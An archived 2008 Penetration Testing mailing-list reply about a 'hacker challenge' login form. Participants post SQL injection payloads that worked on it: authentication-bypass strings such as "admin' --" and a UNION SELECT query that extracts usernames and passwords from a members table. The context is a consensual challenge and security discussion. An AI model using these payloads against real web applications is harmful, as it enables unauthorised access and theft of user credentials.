Penetration Testing mailing list archives
Re: hacker challenge... pwn3d login form
From: "Vivek P" <iamherevivek () gmail com>
Date: Sun, 7 Sep 2008 16:04:30 +0530
Jorge, I think misdirection was a little arbit! Normal User access (no user creation needed / could shut down DB!!) '-- ' --/* Admin admin' -- admin' -- /* Thanks On Sun, Sep 7, 2008 at 4:25 AM, GulfTech Security Research <security () gulftech org> wrote:
Hi Jorge, Did you say the cookie bit to throw people off? I notice that basically the cookie is using an md5'ed version of the username as the id, and I get that, but I actually got in by using the username "admin' -- /*" and the password "1". Also, I have been able to exploit the search feature to get this information also by sending a query like this. -99' UNION SELECT 1,2,username,password,5 FROM members -- /* Kind Regards, James ------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Get 45 Min Video and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
-- Regards Vivek P Nair VP Technology Appin Software Security Private Limited d3@dbr@1n - I though i would change the world, they wouldnt gimme the source code!! Three ways to gain Success 1. know more than others 2. work more than others 3. expect less than others ------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Get 45 Min Video and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
Current thread:
- hacker challenge... pwn3d login form Jorge L. Vazquez (Sep 06)
- Re: hacker challenge... pwn3d login form GulfTech Security Research (Sep 06)
- Re: hacker challenge... pwn3d login form Vivek P (Sep 07)
- Re: hacker challenge... pwn3d login form Jorge L. Vazquez (Sep 07)
- Re: hacker challenge... pwn3d login form unistd.h (Sep 07)
- <Possible follow-ups>
- Re: hacker challenge... pwn3d login form Tyler Johnson (Sep 07)
- Re: hacker challenge... pwn3d login form GulfTech Security Research (Sep 06)